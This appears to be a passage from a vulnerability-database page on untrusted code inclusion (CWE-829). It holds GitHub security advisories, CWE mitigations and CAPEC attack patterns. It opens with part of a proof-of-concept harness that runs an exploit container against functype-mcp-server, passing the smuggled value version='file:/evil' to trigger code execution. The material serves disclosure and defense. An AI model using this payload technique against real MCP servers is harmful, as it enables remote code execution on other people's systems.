parser.add_argument(\"--build-only\", action=\"store_true\", help=\"Only build the image, do not run\")\n args = parser.parse_args()\n\n # \u2500\u2500 Build \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n print(\"[poc] Building Docker image (this may take a few minutes)...\")\n print(f\"[poc] Build command: {\u0027 \u0027.join(BUILD_CMD)}\")\n\n try:\n build = run(BUILD_CMD, timeout=900)\n except subprocess.TimeoutExpired:\n msg = \"Docker build timed out after 900 seconds\"\n print(f\"[poc] ERROR: {msg}\")\n write_result(False, \"INCOMPLETE\", f\"\ube4c\ub4dc \ud0c0\uc784\uc544\uc6c3: {msg}\", msg)\n sys.exit(2)\n\n if build.returncode != 0:\n tail = (build.stdout + \"\\n\" + build.stderr)[-3000:]\n print(\"[poc] Build FAILED:\")\n print(tail)\n write_result(\n False,\n \"FAIL\",\n \"Docker \uc774\ubbf8\uc9c0 \ube4c\ub4dc \uc2e4\ud328. pnpm install \ub610\ub294 TypeScript \ube4c\ub4dc \uc624\ub958 \ud655\uc778 \ud544\uc694.\",\n f\"BUILD EXIT {build.returncode}\\n{tail}\",\n )\n sys.exit(1)\n\n print(\"[poc] Build succeeded.\")\n\n if args.build_only:\n print(\"[poc] --build-only flag set; skipping run.\")\n sys.exit(0)\n\n # \u2500\u2500 Run \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n print(f\"[poc] Running exploit container: {\u0027 \u0027.join(RUN_CMD)}\")\n\n try:\n run_result = run(RUN_CMD, timeout=180)\n except subprocess.TimeoutExpired:\n msg = \"Container run timed out after 180 seconds\"\n print(f\"[poc] ERROR: {msg}\")\n write_result(False, \"INCOMPLETE\", f\"\ucee8\ud14c\uc774\ub108 \uc2e4\ud589 \ud0c0\uc784\uc544\uc6c3: {msg}\", msg)\n sys.exit(2)\n\n stdout = run_result.stdout or \"\"\n stderr = run_result.stderr or \"\"\n combined = stdout + \"\\n\" + stderr\n\n print(\"=\" * 60)\n print(\"STDOUT:\")\n print(stdout)\n print(\"STDERR:\")\n print(stderr)\n print(f\"EXIT CODE: {run_result.returncode}\")\n print(\"=\" * 60)\n\n # Success criteria: exit 0 AND exploit succeeded message present\n exploit_succeeded = \"EXPLOIT SUCCEEDED\" in combined\n passed = run_result.returncode == 0 and exploit_succeeded\n\n if passed:\n # Extract key evidence lines\n evidence_lines = [\n line for line in combined.splitlines()\n if any(kw in line for kw in (\"EXPLOIT SUCCEEDED\", \"pwned.txt\", \"evil-payload\", \"RCE:\"))\n ]\n evidence = \"\\n\".join(evidence_lines) if evidence_lines else combined[-1000:]\n\n write_result(\n True,\n \"PASS\",\n (\n \"\ucee8\ud14c\uc774\ub108 \ub0b4 /pwned.txt \uc0dd\uc131 \ud655\uc778: MCP set_functype_version \ub3c4\uad6c\uc5d0 \"\n \u0027version=\"file:/evil\" \uc778\uc218\ub97c \uc804\ub2ec\ud558\uc790 \uc11c\ubc84\uac00 pnpm add functype@file:/evil\uc744 \uc2e4\ud589\ud55c \ud6c4 \u0027\n \"initDocsData(true)\uac00 \ub3d9\uc801 import\ub97c \ud1b5\ud574 evil/cli.js\ub97c \uc2e4\ud589, \uc784\uc758 \ud30c\uc77c \uc4f0\uae30(RCE)\uac00 \ubc1c\uc0dd\ud568.\"\n ),\n evidence,\n )\n print(\"[poc] === PASS: exploit reproduced ===\")\n sys.exit(0)\n\n else:\n # Distinguish failure modes\n if not exploit_succeeded and run_result.returncode == 0:\n verdict = \"INCOMPLETE\"\n reason = (\n \"/pwned.txt\uac00 \uc0dd\uc131\ub418\uc9c0 \uc54a\uc558\uc73c\ub098 \ucee8\ud14c\uc774\ub108\ub294 \uc815\uc0c1 \uc885\ub8cc\ub428. \"\n \"pnpm add \ud6c4 require.resolve \uacbd\ub85c \ud655\uc778 \ud544\uc694 \u2014 pnpm \uac00\uc0c1 \uc2a4\ud1a0\uc5b4 \uad6c\uc870\ub85c \uc778\ud574 \"\n \"node_modules/functype \uc2ec\ubcfc\ub9ad\ub9c1\ud06c\uac00 \uc608\uc0c1 \uc704\uce58\uc5d0 \uc5c6\uc744 \uc218 \uc788\uc74c.\"\n )\n else:\n verdict = \"FAIL\"\n reason = (\n f\"\ucee8\ud14c\uc774\ub108 \uc885\ub8cc \ucf54\ub4dc {run_result.returncode}. \"\n \"exploit.mjs \uc624\ub958 \ub610\ub294 MCP \uc11c\ubc84 \uc2dc\uc791 \uc2e4\ud328. \ub85c\uadf8 \ud655\uc778 \ud544\uc694.\"\n )\n\n write_result(False, verdict, reason, combined[-2000:])\n print(f\"[poc] === {verdict}: exploit did not reproduce ===\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n```",
"id": "GHSA-wcjj-9m6g-2fr2",
"modified": "2026-09-09T23:49:20Z",
"published": "2026-09-09T23:49:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jordanburke/functype/security/advisories/GHSA-wcjj-9m6g-2fr2"
},
{
"type": "WEB",
"url": "https://github.com/jordanburke/functype/commit/c0d58ad9c2a7d15c6117bd3adbbd75de37317dcf"
},
{
"type": "PACKAGE",
"url": "https://github.com/jordanburke/functype"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "functype-mcp-server: MCP `set_functype_version` Package Alias RCE via Unsanitized pnpm install + Dynamic Import"
}
GHSA-WFJ8-M9JG-H945
Vulnerability from github – Published: 2025-05-16 18:31 – Updated: 2026-04-01 18:35Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in NasaTheme Nasa Core allows PHP Local File Inclusion. This issue affects Nasa Core: from n/a through 6.3.2.
{
"affected": [],
"aliases": [
"CVE-2025-39507"
],
"database_specific": {
"cwe_ids": [
"CWE-829",
"CWE-98"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-16T16:15:40Z",
"severity": "HIGH"
},
"details": "Improper Control of Filename for Include/Require Statement in PHP Program (\u0027PHP Remote File Inclusion\u0027) vulnerability in NasaTheme Nasa Core allows PHP Local File Inclusion. This issue affects Nasa Core: from n/a through 6.3.2.",
"id": "GHSA-wfj8-m9jg-h945",
"modified": "2026-04-01T18:35:06Z",
"published": "2025-05-16T18:31:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-39507"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/nasa-core/vulnerability/wordpress-nasa-core-plugin-6-3-2-local-file-inclusion-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WH9V-9X96-V32X
Vulnerability from github – Published: 2022-12-26 06:30 – Updated: 2023-01-05 18:30Certain General Electric Renewable Energy products have a hidden feature for unauthenticated remote access to the device configuration shell. This affects iNET and iNET II before 8.3.0.
{
"affected": [],
"aliases": [
"CVE-2022-24119"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-12-26T05:15:00Z",
"severity": "CRITICAL"
},
"details": "Certain General Electric Renewable Energy products have a hidden feature for unauthenticated remote access to the device configuration shell. This affects iNET and iNET II before 8.3.0.",
"id": "GHSA-wh9v-9x96-v32x",
"modified": "2023-01-05T18:30:30Z",
"published": "2022-12-26T06:30:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24119"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-090-06"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WPQC-H9WP-CHMQ
Vulnerability from github – Published: 2025-12-08 21:30 – Updated: 2025-12-09 16:28Impact
The n8n Git node allows workflows to set arbitrary Git configuration values through the Add Config operation. When an attacker-controlled workflow sets core.hooksPath to a directory within the cloned repository containing a Git hook such as pre-commit, Git executes that hook during subsequent Git operations. Because Git hooks run as local system commands, this behavior can lead to arbitrary command execution on the underlying n8n host.
Successful exploitation requires the ability to create or modify an n8n workflow that uses the Git node.
Affected versions: ≥ 0.123.1 and < 1.119.2
Patches
This issue has been patched in n8n version 1.119.2.
All users running affected versions should upgrade to 1.119.2 or later.
Workarounds
If upgrading is not immediately possible, the following mitigations can reduce exposure:
- Exclude the Git node (Docs).
- Avoid cloning or interacting with untrusted repositories using the Git Node.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "n8n"
},
"ranges": [
{
"events": [
{
"introduced": "0.123.1"
},
{
"fixed": "1.119.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-65964"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-08T21:30:07Z",
"nvd_published_at": "2025-12-09T00:15:48Z",
"severity": "CRITICAL"
},
"details": "### Impact\n\nThe n8n Git node allows workflows to set arbitrary Git configuration values through the _Add Config_ operation. When an attacker-controlled workflow sets `core.hooksPath` to a directory within the cloned repository containing a Git hook such as `pre-commit`, Git executes that hook during subsequent Git operations. Because Git hooks run as local system commands, this behavior can lead to **arbitrary command execution** on the underlying n8n host.\n\nSuccessful exploitation requires the ability to create or modify an n8n workflow that uses the Git node.\n\nAffected versions: **\u2265 0.123.1 and \u003c 1.119.2**\n\n### Patches\n\nThis issue has been patched in **n8n version 1.119.2**.\n\nAll users running affected versions should upgrade to **1.119.2 or later**.\n\n### Workarounds\n\nIf upgrading is not immediately possible, the following mitigations can reduce exposure:\n\n- Exclude the Git node ([Docs](https://n8n-docs.teamlab.info/hosting/securing/blocking-nodes/#exclude-nodes)).\n- Avoid cloning or interacting with untrusted repositories using the Git Node.",
"id": "GHSA-wpqc-h9wp-chmq",
"modified": "2025-12-09T16:28:13Z",
"published": "2025-12-08T21:30:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-wpqc-h9wp-chmq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65964"
},
{
"type": "WEB",
"url": "https://github.com/n8n-io/n8n/commit/d5a1171f95f75def5c3ac577707ab913e22aef04"
},
{
"type": "PACKAGE",
"url": "https://github.com/n8n-io/n8n"
},
{
"type": "WEB",
"url": "https://github.com/n8n-io/n8n/releases/tag/n8n%401.119.2"
},
{
"type": "WEB",
"url": "https://n8n-docs.teamlab.info/hosting/securing/blocking-nodes/#exclude-nodes"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "n8n vulnerable to Remote Code Execution via Git Node Custom Pre-Commit Hook"
}
GHSA-WPVM-WQR4-P7CW
Vulnerability from github – Published: 2021-10-13 15:34 – Updated: 2022-02-08 21:39It was possible to execute a ReDoS-type attack inside CKEditor 4 before 4.16 by persuading a victim to paste crafted URL-like text into the editor, and then press Enter or Space (in the Autolink plugin).
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "ckeditor4"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.16.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-26272"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": true,
"github_reviewed_at": "2021-10-07T19:01:30Z",
"nvd_published_at": "2021-01-26T21:15:00Z",
"severity": "MODERATE"
},
"details": "It was possible to execute a ReDoS-type attack inside CKEditor 4 before 4.16 by persuading a victim to paste crafted URL-like text into the editor, and then press Enter or Space (in the Autolink plugin).",
"id": "GHSA-wpvm-wqr4-p7cw",
"modified": "2022-02-08T21:39:05Z",
"published": "2021-10-13T15:34:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-26272"
},
{
"type": "WEB",
"url": "https://ckeditor.com/blog/CKEditor-4.16-with-improved-image-pasting-High-Contrast-support-and-a-new-color-API/#security-comes-first"
},
{
"type": "PACKAGE",
"url": "https://github.com/ckeditor/ckeditor4"
},
{
"type": "WEB",
"url": "https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-416"
},
{
"type": "WEB",
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Inclusion of Functionality from Untrusted Control Sphere in CKEditor 4"
}
GHSA-WQ2J-W9PM-7X2P
Vulnerability from github – Published: 2025-09-22 21:10 – Updated: 2025-09-22 21:59Summary
Arbitrary themes can be loaded through query parameters. If an installed theme had a vulnerability, even if it was not used on any page, this could be loaded on unsuspecting clients without knowledge of the site owner.
Details
Many people who run DNN sites have a number of installed themes that they do not actually use. This could be because they were testing many themes during initial setup, because they have changed themes over time, or because they have development and production versions of a theme. Whatever the reason, many times the unused themes will become outdated over time as site admins wouldn't have reason to update something that is not used. However, this could introduce an entry point to exploit a vulnerable theme by making the server run the unused theme for unsuspecting client requests. Depending on the vulnerability in a theme, this could lead to server side or client side arbitrary code execution. With DNN 10.1.0 this functionality is now disabled by default but a setting was introduced in the Security module to turn activate the functionality.
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "DotNetNuke.Core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-59535"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-829"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-22T21:10:20Z",
"nvd_published_at": "2025-09-22T21:16:00Z",
"severity": "MODERATE"
},
"details": "### Summary\nArbitrary themes can be loaded through query parameters. If an installed theme had a vulnerability, even if it was not used on any page, this could be loaded on unsuspecting clients without knowledge of the site owner.\n\n### Details\nMany people who run DNN sites have a number of installed themes that they do not actually use. This could be because they were testing many themes during initial setup, because they have changed themes over time, or because they have development and production versions of a theme. Whatever the reason, many times the unused themes will become outdated over time as site admins wouldn\u0027t have reason to update something that is not used. However, this could introduce an entry point to exploit a vulnerable theme by making the server run the unused theme for unsuspecting client requests. Depending on the vulnerability in a theme, this could lead to server side or client side arbitrary code execution. With DNN 10.1.0 this functionality is now disabled by default but a setting was introduced in the Security module to turn activate the functionality.",
"id": "GHSA-wq2j-w9pm-7x2p",
"modified": "2025-09-22T21:59:35Z",
"published": "2025-09-22T21:10:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-wq2j-w9pm-7x2p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59535"
},
{
"type": "WEB",
"url": "https://github.com/dnnsoftware/Dnn.Platform/commit/72f30f69fd2214d77f6c2577dfcca495a24caf5c"
},
{
"type": "WEB",
"url": "https://dnncommunity.org/?SkinSrc=%5BG%5Dskins%2Fxcillion%2Fhome\u0026ContainerSrc=%5BG%5DContainers%2FXcillion%2FNoTitle"
},
{
"type": "PACKAGE",
"url": "https://github.com/dnnsoftware/Dnn.Platform"
},
{
"type": "WEB",
"url": "https://github.com/dnnsoftware/Dnn.Platform/blob/develop/DNN%20Platform/Library/UI/Skins/Skin.cs#L305"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "DNN allows loading unused themes on anonymous clients through query parameters"
}
GHSA-WQPV-C3PP-3M58
Vulnerability from github – Published: 2026-04-28 06:30 – Updated: 2026-07-08 17:41OpenStack Ironic before 35.0.1 allows ipmitool execution in a non-default configuration that has a console interface.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "ironic"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "35.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42510"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T19:41:11Z",
"nvd_published_at": "2026-04-28T06:16:04Z",
"severity": "MODERATE"
},
"details": "OpenStack Ironic before 35.0.1 allows ipmitool execution in a non-default configuration that has a console interface.",
"id": "GHSA-wqpv-c3pp-3m58",
"modified": "2026-07-08T17:41:31Z",
"published": "2026-04-28T06:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42510"
},
{
"type": "WEB",
"url": "https://bugs.launchpad.net/ironic/+bug/2148331"
},
{
"type": "PACKAGE",
"url": "https://github.com/openstack/ironic"
},
{
"type": "WEB",
"url": "https://security.openstack.org/ossa/OSSA-2026-008.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/04/30/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "OpenStack Ironic is Vulnerable to Inclusion of Functionality from Untrusted Control Sphere"
}
GHSA-WRGQ-X2FX-9WW7
Vulnerability from github – Published: 2025-11-11 21:30 – Updated: 2025-11-11 21:30A vulnerability has been identified in Spectrum Power 4 (All versions < V4.70 SP12 Update 2). The affected application is vulnerable to run arbitrary commands via the user interface. This user interface can be used via the network and allows the execution of commands as administrative application user.
{
"affected": [],
"aliases": [
"CVE-2024-32011"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-11T21:15:35Z",
"severity": "HIGH"
},
"details": "A vulnerability has been identified in Spectrum Power 4 (All versions \u003c V4.70 SP12 Update 2). The affected application is vulnerable to run arbitrary commands via the user interface. This user interface can be used via the network and allows the execution of commands as administrative application user.",
"id": "GHSA-wrgq-x2fx-9ww7",
"modified": "2025-11-11T21:30:28Z",
"published": "2025-11-11T21:30:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32011"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-339694.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation MIT-4
Strategy: Libraries or Frameworks
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Mitigation MIT-21.1
Strategy: Enforcement by Conversion
- When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
- For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Mitigation MIT-15
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Mitigation MIT-22
Strategy: Sandbox or Jail
- Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.
- OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-17
Strategy: Environment Hardening
Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
Mitigation MIT-5.1
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
- Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-34
Strategy: Attack Surface Reduction
- Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.
- This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface.
Mitigation MIT-6
Strategy: Attack Surface Reduction
- Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
- Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-175: Code Inclusion
An adversary exploits a weakness on the target to force arbitrary code to be retrieved locally or from a remote location and executed. This differs from code injection in that code injection involves the direct inclusion of code while code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.
CAPEC-201: Serialized Data External Linking
An adversary creates a serialized data file (e.g. XML, YAML, etc...) that contains an external data reference. Because serialized data parsers may not validate documents with external references, there may be no checks on the nature of the reference in the external data. This can allow an adversary to open arbitrary files or connections, which may further lead to the adversary gaining access to information on the system that they would normally be unable to obtain.
CAPEC-228: DTD Injection
An attacker injects malicious content into an application's DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.
CAPEC-251: Local Code Inclusion
The attacker forces an application to load arbitrary code files from the local machine. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.
CAPEC-252: PHP Local File Inclusion
The attacker loads and executes an arbitrary local PHP file on a target machine. The attacker could use this to try to load old versions of PHP files that have known vulnerabilities, to load PHP files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.
CAPEC-253: Remote Code Inclusion
The attacker forces an application to load arbitrary code files from a remote location. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load malicious files that the attacker placed on the remote machine, or to otherwise change the functionality of the targeted application in unexpected ways.
CAPEC-263: Force Use of Corrupted Files
This describes an attack where an application is forced to use a file that an attacker has corrupted. The result is often a denial of service caused by the application being unable to process the corrupted file, but other results, including the disabling of filters or access controls (if the application fails in an unsafe way rather than failing by locking down) or buffer overflows are possible.
CAPEC-538: Open-Source Library Manipulation
Adversaries implant malicious code in open source software (OSS) libraries to have it widely distributed, as OSS is commonly downloaded by developers and other users to incorporate into software development projects. The adversary can have a particular system in mind to target, or the implantation can be the first stage of follow-on attacks on many systems.
CAPEC-549: Local Execution of Code
An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.
CAPEC-640: Inclusion of Code in Existing Process
The adversary takes advantage of a bug in an application failing to verify the integrity of the running process to execute arbitrary code in the address space of a separate live process. The adversary could use running code in the context of another process to try to access process's memory, system/network resources, etc. The goal of this attack is to evade detection defenses and escalate privileges by masking the malicious code under an existing legitimate process. Examples of approaches include but not limited to: dynamic-link library (DLL) injection, portable executable injection, thread execution hijacking, ptrace system calls, VDSO hijacking, function hooking, reflective code loading, and more.
CAPEC-660: Root/Jailbreak Detection Evasion via Hooking
An adversary forces a non-restricted mobile application to load arbitrary code or code files, via Hooking, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Adversaries may further leverage these capabilities to escalate privileges or bypass access control on legitimate applications. Although many mobile applications check if a mobile device is Rooted/Jailbroken prior to authorized use of the application, adversaries may be able to "hook" code in order to circumvent these checks. Successfully evading Root/Jailbreak detection allows an adversary to execute administrative commands, obtain confidential data, impersonate legitimate users of the application, and more.
CAPEC-695: Repo Jacking
An adversary takes advantage of the redirect property of directly linked Version Control System (VCS) repositories to trick users into incorporating malicious code into their applications.
CAPEC-698: Install Malicious Extension
An adversary directly installs or tricks a user into installing a malicious extension into existing trusted software, with the goal of achieving a variety of negative technical impacts.